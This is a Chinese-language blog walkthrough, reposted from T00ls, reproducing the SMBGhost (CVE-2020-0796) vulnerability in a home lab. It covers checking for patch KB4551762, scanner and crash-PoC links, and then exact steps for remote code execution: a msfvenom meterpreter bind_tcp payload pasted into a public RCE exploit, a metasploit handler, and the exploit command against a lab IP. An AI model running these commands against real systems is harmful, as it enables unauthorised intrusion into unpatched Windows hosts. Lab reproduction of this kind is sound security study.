【CVE-2020-0796】漏洞POC复现

admin 2021年4月25日02:12:17评论52 views字数 1162阅读3分52秒阅读模式

【CVE-2020-0796】漏洞POC复现

首先使用systeminfo确定下主机有没有打过这个补丁KB4551762、

【CVE-2020-0796】漏洞POC复现



个人主机
虽然这个上面没有显示KB4551762的补丁,但是我一直都有更新补丁,可能是显示不全,所以大家还是去window更新里面点击查看更新历史记录里面的其他更新

【CVE-2020-0796】漏洞POC复现



或者使用 dism /online /get-packages | clip 也可以查看更新历史
这条命令使用后,结果会在剪切板里面,找个文档复制进去就行。
由于主机和悬剑都都不存在这个漏洞,我就去下了个环境ed2k://|file|cn_windows_10_business_editions_version_1903_x64_dvd_e001dd2c.iso|4815527936|47D4C57E638DF8BF74C59261E2CE702D|
主机IP:192.168.31.35
靶机IP:192.168.31.235
Kali IP:192.168.31.31
检测脚本:https://github.com/ollypwn/SMBGhost 
怎么说呢,这个好像有点不准,主机打过补丁也显示可攻击
我一共使用过三个检测的脚本,我还是觉得奇安信的靠谱点,所以我这里使用的是奇安信的检查工具 地址http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip

【CVE-2020-0796】漏洞POC复现



还有蓝屏的poc地址蓝屏pochttps://github.com/eerykitty/CVE-2020-0796-PoC

【CVE-2020-0796】漏洞POC复现



【CVE-2020-0796】漏洞POC复现



一次不行,就多用几次
重点来了,本次利用的脚本https://github.com/chompie1337/SMBGhost_RCE_PoC.git
首先用kali 下载这个脚本,
使用msfvenom  -p windows/x64/meterpreter/bind_tcp  lport=6666 -f py -o niubi.py

【CVE-2020-0796】漏洞POC复现



然后使用查看内容  把里面的buf 替换成PAY_LOAD

【CVE-2020-0796】漏洞POC复现



【CVE-2020-0796】漏洞POC复现



然后把这一段代码粘贴到exploit脚本当中

【CVE-2020-0796】漏洞POC复现



【CVE-2020-0796】漏洞POC复现



进入metasploit
use exploit/multi/handler 
set payload windows/x64/meterpreter/bind_tcp
set  lport 6666
set rhost 192.168.31.235
Show options 查看
Exploit

【CVE-2020-0796】漏洞POC复现




回到之前给的poc脚本 运行python3 exploit.py -ip  192.168.31.235 
怎么说呢,这个脚本有些不太稳定,有可能也会导致蓝屏,我第一次成功后,也蓝屏了几次

【CVE-2020-0796】漏洞POC复现



这个需要关闭defender防火墙 ,最好把安全中心也关闭一下,把网络设置设成专用网络
在t00ls学到的了很多东西,感谢各位大佬


【CVE-2020-0796】漏洞POC复现

本文始发于微信公众号(T00ls):【CVE-2020-0796】漏洞POC复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月25日02:12:17
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【CVE-2020-0796】漏洞POC复现https://cn-sec.com/archives/348542.html

发表评论

匿名网友 填写信息